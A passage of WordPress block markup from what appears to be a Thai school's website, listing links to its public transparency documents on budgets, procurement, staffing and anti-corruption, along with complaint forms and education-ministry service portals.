{\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"large\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:heading {\"textAlign\":\"center\",\"level\":5} -->\n<h5 class=\"wp-block-heading has-text-align-center\"><a href=\"https://drive.google.com/file/d/1whIeTfY6kQosZ-McO5fR8M2eQCwpxNnI/view?usp=sharing\">แผนปฏิบัติการประจำปีการศึกษา</a></h5>\n<!-- /wp:heading -->\n\n<!-- wp:heading {\"textAlign\":\"center\",\"level\":5,\"align\":\"full\"} -->\n<h5 class=\"wp-block-heading alignfull has-text-align-center\"><a href=\"https://drive.google.com/file/d/1q0z8a2Mbu3x-c8vLwrElwX6v8BJY7jtB/view?usp=sharing\">แผนพัฒนาการจัดการศึกษา</a></h5>\n<!-- /wp:heading -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"3298cf22\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"ea4e4ab8\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1whIeTfY6kQosZ-McO5fR8M2eQCwpxNnI/view?usp=drive_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br><a href=\"https://drive.google.com/file/d/1cgINnIyago0IrJkXeI7V2y4G4p5Zq3yR/view?usp=sharing\">     - คู่มือฝ่ายบริหารงานงบประมาณ</a><br><a href=\"https://drive.google.com/file/d/1DstLLhCLdPqU3gL1bu5p0UByVlg4Yt9t/view?usp=drive_link\">  - คู่มือฝ่ายบริหารงานวิชาการ</a><br><a href=\"https://drive.google.com/file/d/1d2db3xyqZbucO821fPXAU0frbQC9W5KA/view?usp=drive_link\" data-type=\"page\" data-id=\"2\"> - คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1QhT6YZ7u_mYXsy_mZUDQXHL1Yx0XHO7B/view?usp=drive_link\">  - คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1woP9ChkM3zQI8gthAIPX43-z4ymQZZLk/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=drive_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1YhuyYvmrvtvgv6jkYfYHMulIorbiuLIA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1Nf4XWZmTyc4NdsmEJfShsVdo2WXGwzgr/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=sharing\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1l-VlfXu6thxBFvL0JpgAcCUrTrqNNp4G/view?usp=sharing\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1AeKeechkWj0RdYe5xvMgrFXsQiTu26xV/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_ecdd7d-71\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/up